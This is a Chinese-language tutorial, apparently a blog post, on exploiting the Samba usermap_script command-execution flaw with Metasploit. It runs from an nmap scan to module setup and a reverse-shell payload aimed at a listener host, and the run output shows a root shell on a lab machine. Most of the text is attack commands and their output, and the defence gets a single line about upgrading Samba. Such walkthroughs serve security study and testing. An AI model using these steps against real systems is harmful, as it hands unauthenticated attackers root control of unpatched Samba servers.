Samba介绍
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。
一般运行在 139、445端口。
探测目标samba
使用 nmap -sV -p 139 445 IP地址 探测目标端口服务版本信息。
➜ ~ nmap -sV -p 139,445 10.0.2.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-13 09:16 EDT
Nmap scan report for 10.0.2.5
Host is up (0.00048s latency).
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
MAC Address: 08:00:27:87:7B:B0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
metasploit漏洞利用
在Metasploit中集成了利用samba usermap RCE的脚本。
exploit/mulit/samba/usermap_script,该模块利用Samba 3.0.20到3.0.25rc3版本中的命令执行漏洞。当使用非默认的“用户名映射脚本”配置选项时,通过指定包含shell元字符的用户名,攻击者可以执行任意命令。利用此漏洞不需要身份验证,因为此选项用于在身份验证之前映射用户名!
1、 登录msfconsole
➜ ~ msfconsole
[-] ***Rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v5.0.2-dev ]
+ -- --=[ 1852 exploits - 1046 auxiliary - 325 post ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
+ -- --=[ ** This is Metasploit 5 development branch ** ]
2、使用 exploit/multi/samba/usermap_script 模块
msf5 > use exploit/multi/samba/usermap_script
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.0.2.5
rhosts => 10.0.2.5
3、配置对应的payload
msf5 exploit(multi/samba/usermap_script) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Check Description
---- --------------- ---- ----- -----------
cmd/unix/bind_awk normal No Unix Command Shell, Bind TCP (via AWK)
cmd/unix/bind_busybox_telnetd normal No Unix Command Shell, Bind TCP (via BusyBox telnetd)
cmd/unix/bind_inetd normal No Unix Command Shell, Bind TCP (inetd)
cmd/unix/bind_lua normal No Unix Command Shell, Bind TCP (via Lua)
cmd/unix/bind_netcat normal No Unix Command Shell, Bind TCP (via netcat)
cmd/unix/bind_netcat_gaping normal No Unix Command Shell, Bind TCP (via netcat -e)
cmd/unix/bind_netcat_gaping_ipv6 normal No Unix Command Shell, Bind TCP (via netcat -e) IPv6
cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
cmd/unix/bind_r normal No Unix Command Shell, Bind TCP (via R)
cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
cmd/unix/bind_socat_udp normal No Unix Command Shell, Bind UDP (via socat)
cmd/unix/bind_zsh normal No Unix Command Shell, Bind TCP (via Zsh)
cmd/unix/generic normal No Unix Command, Generic Command Execution
cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
cmd/unix/reverse_awk normal No Unix Command Shell, Reverse TCP (via AWK)
cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
cmd/unix/reverse_ksh normal No Unix Command Shell, Reverse TCP (via Ksh)
cmd/unix/reverse_lua normal No Unix Command Shell, Reverse TCP (via Lua)
cmd/unix/reverse_ncat_ssl normal No Unix Command Shell, Reverse TCP (via ncat)
cmd/unix/reverse_netcat normal No Unix Command Shell, Reverse TCP (via netcat)
cmd/unix/reverse_netcat_gaping normal No Unix Command Shell, Reverse TCP (via netcat -e)
cmd/unix/reverse_openssl normal No Unix Command Shell, Double Reverse TCP SSL (openssl)
cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
cmd/unix/reverse_php_ssl normal No Unix Command Shell, Reverse TCP SSL (via php)
cmd/unix/reverse_python normal No Unix Command Shell, Reverse TCP (via Python)
cmd/unix/reverse_python_ssl normal No Unix Command Shell, Reverse TCP SSL (via python)
cmd/unix/reverse_r normal No Unix Command Shell, Reverse TCP (via R)
cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
cmd/unix/reverse_socat_udp normal No Unix Command Shell, Reverse UDP (via socat)
cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
cmd/unix/reverse_zsh normal No Unix Command Shell, Reverse TCP (via Zsh)
msf5 exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf5 exploit(multi/samba/usermap_script) > set lhost 10.0.2.12
lhost => 10.0.2.12
4、检查配置
msf5 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.0.2.5 yes The target address range or CIDR identifier
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
5、执行漏洞攻击
msf5 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP double handler on 10.0.2.12:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo QjHmlGUEJtamvm3u;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "QjHmlGUEJtamvm3u\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.0.2.12:4444 -> 10.0.2.5:49680) at 2019-07-13 09:31:24 -0400
id
uid=0(root) gid=0(root)
如何防御?
修复方案:升级samba。
推荐汇总贴: 漏洞利用套路汇总